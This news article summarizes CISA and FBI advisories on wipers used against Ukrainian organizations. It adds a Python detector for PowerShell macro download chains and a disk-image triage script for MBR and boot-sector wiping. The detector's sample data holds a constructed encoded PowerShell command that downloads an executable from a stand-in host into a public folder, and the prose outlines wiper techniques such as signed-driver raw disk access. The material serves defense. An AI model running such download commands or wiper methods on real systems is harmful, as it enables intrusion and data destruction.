CISA, FBI provide updates on destructive malware targeting organizations in Ukraine, including WhisperGate malware

U.S. cybersecurity agencies updated their earlier advisory to include additional Indicators of Compromise (IOCs) for WhisperGate and provided technical details for the HermeticWiper, IsaacWiper, HermeticWizard, and CaddyWiper destructive malware. Since January, these wipers have been deployed against organizations in Ukraine to destroy computer systems and render them inoperable. Additionally, the advisory provides recommended guidance and considerations for organizations to address network architecture, security baselines, continuous monitoring, and incident response practices.

“Leading up to Russia’s unprovoked attack against Ukraine, threat actors deployed destructive malware against organizations in Ukraine to destroy computer systems and render them inoperable,” the Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) said in their latest advisory.

Destructive malware poses a direct threat to an organization’s daily operations by taking critical assets and data offline. Further disruptive cyberattacks against organizations in Ukraine are likely to occur and may unintentionally spill over to organizations in other countries. Organizations should therefore increase vigilance and evaluate their planning, preparation, detection, and response capabilities for such an event.

The advisory said that the listed hashes correspond to malicious binaries, droppers, and macros linked to WhisperGate activity. “The binaries are predominantly .Net and are obfuscated. Obfuscation varies; some of the binaries contain multiple layers of obfuscation. The analysis identified multiple uses of string reversal, character replacement, base64 encoding, and packing. Additionally, the malicious binaries contain multiple defenses, including VM checks, sandbox detection and evasion, and anti-debugging techniques. Finally, the sleep command was used in varying lengths via PowerShell to obfuscate execution on a victim’s network,” it added.

The advisory said that all Microsoft .doc files contain a malicious macro that is base64 encoded. “Upon enabling the macro, a PowerShell script runs a sleep command and then downloads a file from an external site. The script connects to the external website via HTTP to download an executable. Upon download, the executable is saved to the C:\Users\Public\Documents\ filepath on the victim host,” it added.
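The macro chain described above (Office document, PowerShell, a sleep, an HTTP fetch, a drop into C:\Users\Public\Documents\) is a good fit for process-creation telemetry, because every stage leaves a command line. The following is an added example, not code from the advisory or from CISA: it decodes PowerShell's base64 `-EncodedCommand` payload (UTF-16LE under base64, which is how PowerShell itself encodes it) and scores each event against the indicators the advisory names. The event field names, the specific cmdlets looked for (Start-Sleep, Invoke-WebRequest, WebClient.DownloadFile, and so on), the example.invalid URL and the sample events are all assumptions constructed for this example.

```python
"""Score constructed process-creation events for the macro -> PowerShell ->
sleep -> HTTP download -> C:\\Users\\Public\\Documents chain. Added example:
the event schema, cmdlet list and sample events are assumptions, not a
real product's telemetry or IOCs from the advisory."""
import base64
import re

DROP_DIR = r"c:\users\public\documents"
SLEEP_RE = re.compile(r"start-sleep|\[threading\.thread\]::sleep", re.I)
HTTP_RE = re.compile(r"https?://[^\s'\"]+", re.I)
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer", re.I)
# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str):
    """Return the script carried by -EncodedCommand (base64 of UTF-16LE text),
    or None when the command line has none or it does not decode cleanly."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: dict):
    """Return (score, hits) for one event with keys parent_image, image, command_line.
    Only PowerShell launches are scored; each matched indicator adds one point."""
    hits = []
    if not event.get("image", "").lower().endswith("powershell.exe"):
        return 0, hits
    if event.get("parent_image", "").lower().endswith(("winword.exe", "excel.exe")):
        hits.append("office-parent")
    script = event.get("command_line", "")
    decoded = decode_encoded_command(script)
    if decoded:
        hits.append("encoded-command")
        script = script + " " + decoded          # match indicators inside the payload too
    if SLEEP_RE.search(script):
        hits.append("sleep")
    if DOWNLOAD_RE.search(script) and HTTP_RE.search(script):
        hits.append("http-download")
    if DROP_DIR in script.lower().replace("/", "\\"):
        hits.append("public-documents-drop")
    return len(hits), hits


# --- constructed sample events (not real telemetry) ----------------------
MALICIOUS_SCRIPT = (r"Start-Sleep -Seconds 45; (New-Object Net.WebClient).DownloadFile("
                    r"'http://example.invalid/update.exe','C:\Users\Public\Documents\update.exe')")
ENCODED = base64.b64encode(MALICIOUS_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-Date"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -Command Invoke-WebRequest https://example.invalid/a.zip -OutFile C:\Temp\a.zip"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        score, hits = score_event(ev)
        print(f"score={score} hits={hits} :: {ev['command_line'][:60]}...")
```

Scoring rather than a single boolean lets an analyst set the alert threshold: the constructed malicious event hits all five indicators, a plain Invoke-WebRequest to a temp directory scores one, and an interactive Get-Date scores nothing.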

In the case of the HermeticWiper malware, CISA received seven files for analysis. Five of these files were identified as HermeticWiper, all digitally signed by Hermetica Digital Ltd. The other two files are 32-bit and 64-bit copies of the EaseUS Partition Master NT Driver (EPMNTDrv), both digitally signed by Chengdu Yiwo Technology Development Co., Ltd with an expired certificate issued in 2012, according to the Malware Analysis Report (MAR) released on Thursday.

“The wiper contains four copies of compressed EPMNTDrv in its resource section. Each EPMNTDrv targets different versions and architectures of the Windows operating system (OS),” the HermeticWiper MAR said. Upon execution, the wiper extracts and expands the matching driver, registers it under a service key, and starts the service immediately. Once the service is running and the driver is resident in memory, the service key and the driver file on disk are deleted. The driver gives the wiper raw read and write access to the disk, bypassing the file system.

CISA said that the wiper overwrites the Master Boot Record (MBR), the New Technology File System (NTFS) boot sector, and the data and attributes the system relies on for system restoration. In addition, the wiper sets a sleep timer whose length can be supplied as the wiper’s first numeric command-line argument. If the wiper runs with administrative privileges, or if the wiper’s file name begins with the ‘c’ character, the expiration of the timer triggers a forced system shutdown followed by an immediate reboot, rendering the system useless at that point, it added.

“Before the timer expires, the wiper continues the fragmentation process on the disk and overwrites the File Allocation Table (FAT) file system Boot Sector or the NTFS Master File Table (MFT) and its backup in $MFTMirr, user’s files from user’s directories and the attributes and data contents of the Windows Event Logs with random bytes,” the MAR report said. Next, the wiper will stop the fragmentation, locate the allocated clusters and overwrite them with random bytes. Finally, the wiper overwrites itself with random bytes, and the wiping process is terminated.

In another MAR released Thursday covering details of the IsaacWiper and HermeticWizard malware, the CISA received six files for analysis: five 32-bit Dynamic-link Library (DLL) files and one 32-bit executable file. 

“During analysis of HermeticWizard, another file was dropped and identified as HermeticWiper. The submitted files are designed to spread laterally through a network via Server Message Block (SMB) and Windows Management Instrumentation (WMI),” according to the MAR report. These files attempt to overwrite the first 65536 bytes of data contained on the C:\ drive and any attached storage disks to render them useless to the victim user. The malware also creates a file and continuously writes to it until the disk runs out of free space and crashes. Upon reboot, the machine is no longer operable, it added.

In connection with the CaddyWiper destructive malware, CISA received one unique file for analysis. “This file is a malicious 32-bit Windows Portable Executable (PE). During runtime, this malware attempts to overwrite the victim user’s files with null bytes. The malware also attempts to overwrite the Master Boot Record of attached drives with null bytes, thereby corrupting them and rendering it impossible for the victim to access the victim’s stored data,” the MAR said.
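The three wipers above leave recognizable traces in the first sectors of a disk: CaddyWiper nulls the MBR, HermeticWiper fills the MBR and the NTFS boot sector with random bytes, and IsaacWiper zeroes the first 65536 bytes of each drive. The following added example (not code from the CISA reports, and the disk images it examines are constructed here, not samples from the MARs) triages a raw image for those effects: it checks the 0x55AA boot signature, walks the partition table to the NTFS boot sector and its "NTFS    " OEM ID, and classifies any damaged block as null-filled or high-entropy. The entropy threshold and the partition layout are assumptions chosen for the example.

```python
"""Offline triage of the first sectors of a disk image for wiper damage:
MBR nulled (CaddyWiper-style), MBR or NTFS boot sector randomized
(HermeticWiper-style), first 65536 bytes zeroed (IsaacWiper-style).
Added example; images below are constructed, not from the CISA MARs."""
import random
import struct
from collections import Counter
from math import log2

SECTOR = 512
BOOT_SIG = b"\x55\xaa"          # closes both the MBR and an NTFS boot sector
HEAD_LEN = 65536                # overwrite length the IsaacWiper MAR reports
RANDOM_ENTROPY_BITS = 7.0       # assumption: 512 random bytes score ~7.6 bits, boot code far lower


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * log2(c / n) for c in Counter(data).values())


def classify_block(data: bytes) -> str:
    """'zeroed' for all-null data, 'random' for high entropy, else 'structured'."""
    if not any(data):
        return "zeroed"
    if shannon_entropy(data) >= RANDOM_ENTROPY_BITS:
        return "random"
    return "structured"


def parse_mbr(mbr: bytes):
    """Return [(type, lba_start, sector_count), ...] for used partition entries,
    or None when the 0x55AA signature is gone and the table cannot be trusted."""
    if len(mbr) < SECTOR or mbr[510:512] != BOOT_SIG:
        return None
    parts = []
    for i in range(4):
        entry = mbr[446 + 16 * i: 462 + 16 * i]
        ptype = entry[4]
        lba, count = struct.unpack_from("<II", entry, 8)
        if ptype:
            parts.append((ptype, lba, count))
    return parts


def triage(image: bytes) -> list:
    """Return findings for one raw image: MBR state, each NTFS boot sector, head zeroing."""
    findings = []
    mbr = image[:SECTOR]
    parts = parse_mbr(mbr)
    if parts is None:
        findings.append(f"mbr:{classify_block(mbr)}:signature-missing")
    else:
        findings.append("mbr:intact")
        for _ptype, lba, _count in parts:
            vbr = image[lba * SECTOR:(lba + 1) * SECTOR]
            if vbr[3:11] == b"NTFS    " and vbr[510:512] == BOOT_SIG:
                findings.append(f"ntfs-vbr@{lba}:intact")
            else:
                findings.append(f"ntfs-vbr@{lba}:{classify_block(vbr)}")
    head = image[:HEAD_LEN]
    if len(head) == HEAD_LEN and not any(head):
        findings.append("first-64KiB:zeroed")
    return findings


# --- constructed images (assumed layout: one NTFS partition at LBA 64) ---
PART_LBA = 64


def build_intact_image() -> bytes:
    img = bytearray(1024 * 1024)
    img[0:8] = b"\x33\xc0\x8e\xd0\xbc\x00\x7c\xfb"           # a few bytes of boot code
    img[446:462] = bytes([0x80, 0, 0, 0, 0x07, 0, 0, 0]) + struct.pack("<II", PART_LBA, 1984)
    img[510:512] = BOOT_SIG
    vbr = PART_LBA * SECTOR
    img[vbr:vbr + 11] = b"\xeb\x52\x90NTFS    "              # jump + NTFS OEM ID
    img[vbr + 510:vbr + 512] = BOOT_SIG
    return bytes(img)


def overwrite(image: bytes, offset: int, fill: bytes) -> bytes:
    """Copy of image with fill written at offset, mimicking a wiper's raw disk write."""
    out = bytearray(image)
    out[offset:offset + len(fill)] = fill
    return bytes(out)


def pseudo_random(n: int, seed: int = 7) -> bytes:
    rng = random.Random(seed)                                 # deterministic so runs are repeatable
    return bytes(rng.getrandbits(8) for _ in range(n))


INTACT = build_intact_image()
SCENARIOS = {
    "intact": INTACT,
    "caddywiper-style nulls over MBR": overwrite(INTACT, 0, bytes(SECTOR)),
    "hermeticwiper-style random over MBR": overwrite(INTACT, 0, pseudo_random(SECTOR)),
    "hermeticwiper-style random over NTFS boot sector": overwrite(INTACT, PART_LBA * SECTOR, pseudo_random(SECTOR)),
    "isaacwiper-style nulls over first 64 KiB": overwrite(INTACT, 0, bytes(HEAD_LEN)),
}

if __name__ == "__main__":
    for name, img in SCENARIOS.items():
        print(f"{name:50} {triage(img)}")
```

On a real case the image would be the first megabyte or so of a dead drive read with a forensic imager; the null-versus-random distinction matters because it separates the CaddyWiper pattern from the HermeticWiper pattern before any deeper MFT analysis.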

Organizations have been urged to set antivirus and antimalware programs to conduct regular scans, enable strong spam filters to prevent phishing emails from reaching end users, filter network traffic, update software, and require multi-factor authentication.

On Jan. 15, Microsoft announced the identification of a sophisticated malware operation targeting multiple organizations in Ukraine. The WhisperGate malware has two stages: it overwrites a system’s master boot record, displays a fake ransom note, and corrupts files with certain file extensions. According to Microsoft’s assessment, WhisperGate is intended to be destructive and is designed to render targeted devices inoperable. Microsoft implemented protections to detect the WhisperGate malware family using Microsoft Defender Antivirus and Microsoft Defender for Endpoint, wherever these are deployed in on-premises and cloud environments.

In reaction to this disclosure, the CISA called upon organizations to implement cybersecurity measures that protect against potential critical threats following reports of the WhisperGate malware wiping out data on Ukrainian computers in a coordinated attack. In addition, users of industrial control or operational technology (OT) systems were directed by the CISA to conduct a test of manual controls to ensure that critical functions remain operable if the organization’s network is unavailable or untrusted.

On Feb. 23, several cybersecurity researchers disclosed that malware known as HermeticWiper was being used against organizations in Ukraine. According to SentinelLabs, the malware targets Windows devices, manipulating the master boot record, which results in subsequent boot failure. 

Once again, CISA and the FBI released an advisory warning of threat actors deploying destructive malware against Ukrainian organizations, with the aim of destroying computer systems and rendering them inoperable in the wake of the Russian attack on Ukraine. The alert also covers the WhisperGate and HermeticWiper malware and lists open-source IOCs that organizations can use to detect and prevent the malware.

CISA has also warned critical infrastructure installations of malicious hackers using influence operations to shape public opinion, undermine trust, amplify division, and sow discord. It also issued a ‘Shields Up’ alert that notifies every organization in the country of potential risk from cyber threats that can disrupt essential services and potentially impact public safety.

On Wednesday, global cybersecurity authorities assessed in a joint cybersecurity advisory that in 2021 malicious cyber actors aggressively exploited newly disclosed critical software vulnerabilities against broad target sets, including public and private sector organizations worldwide.

Global security agencies warned organizations last week that the Russian invasion of Ukraine could expose organizations both within and beyond the region to increased malicious cyber activity from Russian state-sponsored cyber hackers or Russian-aligned cybercrime groups.
